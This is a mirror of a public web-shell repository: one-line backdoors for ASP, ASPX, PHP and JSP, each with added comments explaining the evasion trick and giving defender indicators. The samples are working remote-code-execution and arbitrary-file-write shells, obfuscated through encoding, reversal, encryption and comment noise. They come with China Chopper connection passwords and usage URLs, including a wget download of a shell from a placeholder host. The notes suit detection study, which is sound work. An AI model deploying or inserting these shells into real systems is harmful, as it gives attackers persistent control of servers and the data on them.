mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
======================================================
|| ASP一句话 ||
======================================================
----------------------------------------
<%
' Classic ASP sample: reads the request value "sb" and, when it is non-empty,
' runs it as VBScript with Execute, then ends the response.
' Defender note: Execute/Eval whose argument comes from Request is remote code
' execution; treat any such file in a web root as a compromise indicator.
<!-- caidao setting input:<O>sb=eval(request(0))</O>,connecting pass:0 -->
re= request("sb")
if re <>"" then
execute re
response.end
end if
%>
----------------------------------------
<%
' Classic ASP sample: evaluates the request value whose name is built with chr(112)
' ("p"), then uses Scripting.FileSystemObject to set this file's own attributes to 39
' (read-only + hidden + system + archive in the FileSystemObject attribute bits).
' Defender note: web-root audits should list hidden/system files as well, and should
' flag Eval/Execute fed from Request even when the parameter name is built with chr().
Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
----------------------------------------
<%
' Classic ASP sample: the statement that gets executed is stored as a character-shifted
' string, so the file holds no literal "eval request" text for a signature to match.
' DeCode undoes the shift (character code minus 3 in the general case); the result is a
' conditional Eval of a request value, consistent with the author's note at the bottom.
' Defender note: flag Execute/Eval applied to the output of a string-decoding function.
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
' DeCode: rebuilds the hidden text one character at a time and returns it.
Function DeCode (Coded)
' Errors inside this function are ignored.
On Error Resume Next
For i = 1 To Len (Coded)
Curchar = Mid (Coded, i, 1)
' Character codes 16, 24 and 32 map to fixed values; every other code is lowered by 3.
If Asc (Curchar) = 16 then
Curchar = chr (8)
Elseif Asc (Curchar) = 24 then
Curchar = chr (12)
Elseif Asc (Curchar) = 32 then
Curchar = chr (18)
Else
Curchar = chr (Asc (Curchar) -3)
End if
' Append the decoded character to the function's return value.
DeCode = Decode&Curchar
Next
End Function
'response.write(decode(codeds))
' Caidao (China Chopper) connection: /hkmjj.asp?xx=x , password hkmjj
%>
----------------------------------------
<%
' Classic ASP sample: the request value "pass" is copied through a second variable
' before being handed to Eval, so "eval" and "request" never share a statement.
' Defender note: signatures that require the two keywords on one line miss this;
' track the data flow from Request to Eval/Execute instead.
dim x1,x2
x1 = request("pass")
x2 = x1
eval x2
%>
----------------------------------------
<%
' Classic ASP sample: the executed statement is stored reversed, with /*/ standing in
' for a double quote and \*\ for a line break. MorfiCoder reverses the string and
' restores those characters; the result here is an Eval of the request value "z".
' Defender note: reversed keywords ("tseuqer", "lave") next to StrReverse and Execute
' are a usable static indicator.
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
Password: z
----------------------------------------
<%
' Classic ASP sample: the request value "cmd" is stored in one script block and passed
' to Eval in a second one, so the read and the evaluation are in separate blocks.
' Defender note: scanners that inspect each script block in isolation miss the link.
a=request("cmd")%><%eval a%>
----------------------------------------
<%
' Classic ASP sample: the chr() codes spell "request"; the inner Eval resolves that
' name to the Request object, its value "a" is read, and the outer Eval runs it.
' Defender note: nested Eval with chr() concatenation has no place in application
' code; match on the construct rather than on the word "request".
eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
----------------------------------------
<%
' Classic ASP sample: passes the request value "xiaoma" straight to Execute.
' Defender note: this is the unobfuscated baseline form; a plain-text search of the
' web root for Execute/Eval combined with Request finds it.
execute(request("xiaoma"))%>
----------------------------------------
1":eval request("a")'
----------------------------------------
"%><%eval request("a")%><%'"
----------------------------------------
<%
' Classic ASP sample: stores the request value "x" in Y in one script block and runs
' it with Execute in the next.
' Defender note: same read-then-execute split as other samples on this page; follow
' the variable from Request to Execute across blocks.
Y=request("x")%> <%execute(Y)%>
----------------------------------------
<%
' Classic ASP sample: evaluates the request value "xiaoma" with Eval.
' Defender note: unobfuscated form; any Eval on a Request value is a finding.
eval request("xiaoma")%>
----------------------------------------
┼癥污爠煥敵瑳∨≡┩愾 password: a
----------------------------------------
======================================================
|| ASPX一句话 ||
======================================================
----------------------------------------
<%@ Page Language = Jscript %><%
// ASP.NET JScript sample: assembles the text of an eval(Request[...], "unsafe") call
// from one- and two-character string pieces interleaved with block-comment noise, then
// evaluates that text with eval in "unsafe" mode. The request key is written as the
// arithmetic expression 0-2-5 rather than as a literal.
// Defender note: normalise before matching (strip comments, fold string concatenation);
// a JScript page that calls eval with the "unsafe" option is itself the indicator.
var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
----------------------------------------
<% @Page Language="Jscript"%><%
// ASP.NET JScript sample: evaluates the request item "hucxsz" with eval in "unsafe" mode.
// Defender note: the Jscript page directive together with eval(..., "unsafe") on a
// Request value is the baseline ASPX one-liner pattern to search for.
eval(Request.Item["hucxsz"],"unsafe");%>
----------------------------------------
<%
// ASP.NET sample (C# syntax): when the request carries an uploaded file, the first one
// is saved to Server.MapPath of the request value "f". No authentication, file-type or
// path check is visible, so this is an arbitrary file write chosen by the request.
// Defender note: keep the application identity from writing to script-serving
// directories and alert on new executable content appearing under the site root.
if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
----------------------------------------
<%
' ASP.NET sample (VB syntax): when the request carries an uploaded file, the first one
' is saved to Server.MapPath of the request value "f", with no visible validation.
' Defender note: an upload handler that takes its destination path from the request
' is an arbitrary file write; restrict write permissions under the site root.
If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
----------------------------------------
<script type="text/javascript" language="C#">// <![CDATA[
// ASP.NET sample: the tag is labelled type="text/javascript" but declares C# and only
// constructs WebAdmin2Y.x.y with a fixed string argument. That type is not defined on
// this page; presumably it lives in a separately deployed assembly - confirm on the host.
// Defender note: the page file is only a loader, so also review the application's bin
// directory and loaded assemblies for the referenced type.
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); // ]]></script>
Password: webadmin
----------------------------------------
<script runat="server" language="JScript">
// ASP.NET JScript sample: popup is a thin wrapper around eval. It evaluates str and
// returns the result; the second eval argument is assembled from fragments
// ("u" + "ns" + "afe") so the word "unsafe" never appears as one literal.
// Defender note: an innocuous function name does not change what it does; look for
// server-side JScript eval calls whose option string is built by concatenation.
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
----------------------------------------
<%
// ASP.NET sample: the Base64 literal decodes (code page 65001, UTF-8) to an expression
// that reads the request item "z". The inner popup call evaluates that expression to
// obtain the request value; the outer popup call evaluates the value itself as code.
// popup is not defined in this block; it is an eval wrapper declared in a server-side
// script block of the same sample.
// Defender note: decode Base64 literals during triage; a literal that decodes to a
// Request accessor and is fed to an evaluator is a strong indicator.
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>
Password: z
----------------------------------------
<%@ Page Language="Jscript"%><%
// ASP.NET JScript sample: evaluates the request item "xiaoma" with eval in "unsafe"
// mode and writes the result of the evaluation into the response.
// Defender note: same indicator as the other JScript samples - eval(..., "unsafe") on
// a Request value.
Response.Write(eval(Request.Item["xiaoma"],"unsafe"));%>
----------------------------------------
<%@ Page Language="C#" ValidateRequest="false" %>
<%
// ASP.NET C# sample: reads a byte count from the cookie "f4ck", reads that many bytes of
// the request body, loads them as a .NET assembly and instantiates its type "c" with the
// current page as constructor argument. Request validation is turned off in the page
// directive and every exception is swallowed by the empty catch.
// Defender note: the executed code arrives in the request body and is never written to
// this file, so file scanning sees only the loader. Useful signals are
// Assembly.Load(byte[]) reached from page code and request bodies carrying a PE image.
try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["f4ck"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
======================================================
|| PHP一句话 ||
======================================================
----------------------------------------
?JFIF
<?php
// PHP sample: evaluates the POST field 'caidao' with eval; the @ suppresses errors.
// On this page it follows a JFIF marker, i.e. it is shown behind an image header.
// Defender note: validate uploads by re-encoding images, not by magic bytes, and make
// sure upload directories are never handled by the PHP interpreter.
@eval($_POST['caidao']);?>
----------------------------------------
<?php
// PHP sample: builds the function name 'assert' by stripping backticks from a padded
// string, using mixed-case spellings of built-in names (PHP function names are
// case-insensitive). A request without the POST field 'ice' gets a 'Status:404'
// header; otherwise the field is passed to the assembled function.
// Defender note: match case-insensitively and treat a variable-function call on request
// data as the indicator; the 404 header is there to make the file look absent to probes.
$K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
----------------------------------------
<?php
// PHP sample: uses the /e modifier of preg_replace, which evaluates the replacement
// string as PHP; the replacement is the POST field x. It then prints "|LO|" and exits.
// Defender note: /e was deprecated in PHP 5.5 and removed in PHP 7.0, so this only runs
// on older runtimes; any preg_replace pattern ending in /e with request data is a finding.
@preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>
----------------------------------------
<?php
// PHP sample: array_map is used as the caller. The callback name is 'assert' written
// with a hex escape for one letter, applied to the request value 'test' cast to an array.
// Defender note: callback-taking functions with a request-derived array are an
// execution sink; resolve string escapes before matching function names.
array_map("ass\x65rt",(array)$_REQUEST['test']);?>
----------------------------------------
<?php
// PHP sample: stores the string 'assert' in a nested array and calls it through the
// array element, passing the POST field 'whirlwind'.
// Defender note: the call site shows only an array lookup; flag calls whose callee is
// a string pulled from a variable or array and whose argument is request data.
$item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>
----------------------------------------
<?php
// PHP sample: when the POST field "f4ck" is present, reverses a literal to obtain the
// name base64_decode, decodes the POST field z0 with it and evaluates the result.
// Defender note: reversed function names next to strrev are a static indicator;
// Base64-only POST bodies to a script are a network-side one.
if(isset($_POST["f4ck"])){$a=strrev("edoced_46esab");eval($a($_POST[z0]));}?>
----------------------------------------
<?php
// PHP sample: evaluates the POST field console only when the MD5 of the GET parameter
// 'pass' equals a hard-coded hash (loose == comparison); otherwise it dies with a message.
// Defender note: the gate keeps other parties out, it does not make the file benign.
// The hard-coded hash can serve as an indicator across hosts.
if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3'){eval($_POST[console]);}else{die('fuck off!');}?>
----------------------------------------
<?php
// PHP sample: the executed code is stored Base64-encoded and deflate-compressed, and is
// unpacked and evaluated at run time. What it does cannot be read from this listing;
// the author's note below names a password - decode in an isolated analysis
// environment to confirm.
// Defender note: eval(gzinflate(base64_decode(...))) is a long-standing packer chain
// and a reliable static indicator on its own.
//Password: $ws->Run
eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA==')));
?>
----------------------------------------
<?php
// PHP sample: the statement to run is hidden inside a string of filler words. Each
// str_replace below deletes one filler word or swaps it for a fragment of PHP syntax,
// alternating between two variables; the final value of $fatezero is an eval of the
// POST field 'fatezero'.
// Defender note: a long chain of str_replace calls ending in eval is the indicator;
// the filler vocabulary is arbitrary and should not be relied on as a signature.
$fatezero = "SABERBERSERKER(\$LANCERPCASTEROSTCASTERARCHERCASTER'faCASTERtASSASSINzCASTERASSASSINCASTERro'RIDER)GINTAMA";
$fatestaynight = str_replace("CASTER", "", $fatezero);
$fatezero = str_replace("LANCER", "_", $fatestaynight);
$fatestaynight = str_replace("SABER", "ev", $fatezero);
$fatezero = str_replace("BERSERKER", "al", $fatestaynight);
$fatestaynight = str_replace("RIDER", "]", $fatezero);
$fatezero = str_replace("GINTAMA", ";", $fatestaynight);
$fatestaynight = str_replace("ARCHER", "[", $fatezero);
$fatezero = str_replace("ASSASSIN", "e", $fatestaynight);

// True here because the last replacement changed the string.
if($fatestaynight !== $fatezero)
{
eval($fatezero);//fatezero
}
?>
----------------------------------------
<?php
// PHP sample (file writer): takes a path suffix from GET "a" and hex-encoded content from
// GET "b", decodes the hex two characters at a time and writes the result to the path
// under this script's directory. It then reports success and dumps both values.
// Defender note: the payload travels as plain hex in the query string, so it shows up in
// access logs - long hex-only parameters beginning 3C3F are worth alerting on. Nothing
// validates the path suffix, and a writable web root is what makes the write succeed.
//http://test.com/get_write.php?a=/shell.php&b=3C3F70687020406576616C28245F504F53545B2763616964616F275D293B3F3E
//caidao connecting http://test.com/shell.php pass:caidao
$p=realpath(dirname(__FILE__)."/").$_GET["a"];
$t=$_GET["b"];
$tt="";
// Each pair of hex digits is turned into one byte via a percent-escape.
for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2));
// The file handle is not closed explicitly and write errors are suppressed.
@fwrite(fopen($p,"w"),$tt);
echo "success!";
var_dump($p,$tt);
?>
----------------------------------------
<?php
// PHP sample: both the function name ('assert') and the superglobal name ('_POST') are
// assembled by string concatenation, then the POST field 'k8' is passed to the function.
// Defender note: fold constant string concatenation before matching; variable-variable
// access to a superglobal is rare in legitimate code.
$k="ass"."ert"; $k(${"_PO"."ST"} ['k8']);?>
----------------------------------------
<?php
// PHP sample: when the POST field 'z' is non-empty, Base64-decodes the POST field 'z0'
// and interpolates it into an assignment statement that is then evaluated, so the
// decoded text runs as PHP. Errors are suppressed with @.
// Defender note: eval of a string that interpolates request data is the sink, even when
// it is dressed up as an assignment.
$mujj = $_POST['z'];if ($mujj!=""){$xsser=base64_decode($_POST['z0']);@eval("\$safedg = $xsser;");}?>
----------------------------------------
<?php
// PHP sample: the evaluated statement is stored ROT13-encoded; decoded, it is an eval of
// a POST field.
// Defender note: apply ROT13 to string literals passed to str_rot13 during triage;
// "riny" (ROT13 of "eval") is a cheap static indicator.
eval(str_rot13('riny($_CBFG[cntr]);'));?>
----------------------------------------
<?php
// PHP sample: preg_replace with the /e modifier evaluates its replacement as PHP; the
// replacement is the Base64-decoded request value g.
// Defender note: /e was removed in PHP 7.0; on older runtimes treat any /e pattern
// whose replacement is request-derived as code execution.
preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>
----------------------------------------
<?php
// PHP sample (dropper): writes a second PHP file, ./shell.php, whose content evaluates a
// POST field. This file does not evaluate anything itself.
// Defender note: cleanup has to cover the files a dropper created as well as the dropper;
// file-integrity monitoring on the web root catches the new file.
fputs(fopen("./shell.php","w"),"<?eval(\$_POST[a]);?>")?>
----------------------------------------
<?php
// PHP sample: passes the POST field admin to assert when it is set; otherwise it shows
// phpinfo(), so a plain visit looks like a leftover diagnostics page.
// Defender note: a phpinfo page is a finding in its own right (information disclosure);
// read the source of such pages rather than trusting the rendered output.
if($_POST[admin]){assert($_POST[admin]);}else{phpinfo();}?>
----------------------------------------
<?php
// PHP sample: when the POST field 'ice' is non-empty, calls preg_replace with the /e
// modifier; the replacement text is built from a ROT13-decoded function name ('eval')
// applied to the stored field.
// Defender note: combines two evasions (ROT13 name, /e evaluation); /e no longer exists
// from PHP 7.0 on.
($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)','add');?>
----------------------------------------
<?php
// PHP sample: the name of the function to call comes from the GET parameter 2 and its
// argument from the POST field 1; the file itself names no dangerous function.
// Defender note: the function name is visible in the query string of access logs; flag
// any call whose callee is taken directly from request data.
($_=@$_GET[2]).@$_($_POST[1])?>
caidao: http://site/1.php?2=assert Password: 1
----------------------------------------
<?php
// PHP sample: spells preg_replace one character at a time, then calls it with the /e
// modifier so that the POST field 'h' is evaluated as the replacement.
// Defender note: fold the concatenation before matching; the /e modifier was removed in
// PHP 7.0.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
?>
----------------------------------------
<?php
// PHP sample: evaluates the GET parameter 'idc' when the MD5 hashes of the GET
// parameters 'usr' and 'pass' equal the two hard-coded values (loose == comparison).
// Defender note: credentials and code all travel in the query string, so access logs
// record them; the hard-coded hashes can be used as indicators.
$user="63a9f0ea7bb98050796b649e85481845"; #root
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor

if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
{eval($_GET['idc']);}
?>
---------------------------------------
<?php
// PHP sample: builds a ReflectionFunction for the function named by the GET parameter m
// and invokes it with the GET parameters c and id, echoing the return value. The request
// therefore chooses which PHP function runs and with which two arguments.
// Defender note: reflection or variable-function calls with a request-derived name are
// an execution sink; the chosen function name appears in the access log.
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
?>
shell.php?m=file_put_contents&c=test.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
shell.php?m=file_put_contents&c=test.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
shell.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test.php //在当前目录下面生成一句话马 for windows
shell.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test.php //当前目录下载一句话马 for linux
----------------------------------------
<?php
// PHP sample: passes the POST field sb to assert, which evaluates string arguments as PHP
// on older runtimes.
// Defender note: string evaluation by assert was deprecated in PHP 7.2 and removed in
// PHP 8.0; on older versions treat assert on request data exactly like eval.
assert($_POST[sb]);?>
----------------------------------------
<script language="php">
// PHP sample: uses the script-tag form of a PHP block, so the file contains no PHP
// opening tag, and evaluates the POST field sb with errors suppressed.
// Defender note: this tag form was removed in PHP 7.0; on older runtimes, scanners that
// look only for the usual opening tag miss it.
@eval($_POST[sb])</script>
caidao: <O>h=@eval($_POST1);</O> Password: sb
----------------------------------------
<?php
// PHP sample: evaluates the POST field xiaoma with eval.
// Defender note: unobfuscated baseline form; eval on any request superglobal is a finding.
eval($_POST[xiaoma]);?>
----------------------------------------
<?php
// PHP sample: calls the function named by the GET parameter 'ts7' with the POST field
// 'cmd' as its argument; no function name appears in the file.
// Defender note: a superglobal element used directly as a callee is the indicator.
$_GET['ts7']($_POST['cmd']);?>
//caidao: http://www.target.com/shell.php?ts7=assert
----------------------------------------
<?php
// PHP sample: assembles the function name 'assert' and the superglobal name '_POST' from
// short string pieces separated by block-comment noise, writes the field index as the
// arithmetic expression 0-2-5, and calls the assembled function on that field. Every
// statement is prefixed with @ to suppress errors.
// Defender note: strip comments and fold constant expressions before matching; the
// density of comment noise between tokens is itself anomalous.
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // Password: -7
?>
----------------------------------------
<?
// PHP sample (dropper, short open tag): writes a second file, test.php, whose content
// evaluates a POST field.
// Defender note: it only runs where short_open_tag is enabled; as with any dropper,
// look for the file it created as well as for the dropper itself.
fputs(fopen("test.php","w"),'<?php eval($_POST["cmd"]);?>');?>
----------------------------------------
<?php
// PHP sample: the executed code is stored encrypted in $hash. The decryption key comes
// from the request value 'key', so the plaintext is not recoverable from this file alone
// and a static scan sees only hex. Error reporting and the time limit are both disabled.
// Defender note: eval applied to the output of a decryption routine is the indicator.
// The mcrypt extension used here was deprecated in PHP 7.1 and dropped from core in 7.2.
error_reporting(0);
set_time_limit(0);
// decrypt: hex-decodes the input, takes the leading IV-sized bytes as the IV and
// decrypts the remainder with Rijndael-128 in CBC mode, keyed by the MD5 hex digest of
// $key. Returns the trimmed plaintext.
function decrypt($ciphertext_hex,$key){
$key=md5($key);
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
// This freshly generated IV is never used; the IV comes from the ciphertext below.
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
$ciphertext_dec = pack("H*",$ciphertext_hex);
$iv_dec = substr($ciphertext_dec, 0, $iv_size);
$ciphertext_dec = substr($ciphertext_dec, $iv_size);
$plaintext_dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key,$ciphertext_dec, MCRYPT_MODE_CBC, $iv_dec);
return trim($plaintext_dec);
}
// Without a 'key' request value the script only prints an error string.
if(@$_REQUEST['key']){
$key=$_REQUEST['key'];
$hash='bd40dd58f44adc5c334e53418ea1bcd591521d60662c6753b89dc46bb02b1ecb02bf857eaa0ea5d5a36ecf638d65c55eb9a8f2b17ceb2d740e3eba7792d3995b7d4fdbdf9f5f90b219cf955539b169a40109ff496262cbc21050e6993d1f9a6a678990e0b01a03617dd4b38358d78e9a67eabe8b288487a96ca55a94e8d6614a';
// Assigned but not referenced again in the visible code.
$shellcode='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';
eval(decrypt($hash,$key));
}else{
echo 'ERROR!';
}
//caidao: <0>key=90sec</0> or Url: http://www.target.com/90sec.php?key=90sec Password: shell
----------------------------------------
======================================================
|| JSP一句话 ||
======================================================
----------------------------------------
<%
// JSP sample (file writer): when the request parameter "f" is present, opens a
// FileOutputStream at the application's real path plus "f" and writes the bytes of the
// request parameter "t" to it. The stream is never closed and the path is not checked.
// Defender note: this is an arbitrary file write under the web application root. Run the
// servlet container with a read-only deployment directory and alert on new JSP files.
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
----------------------------------------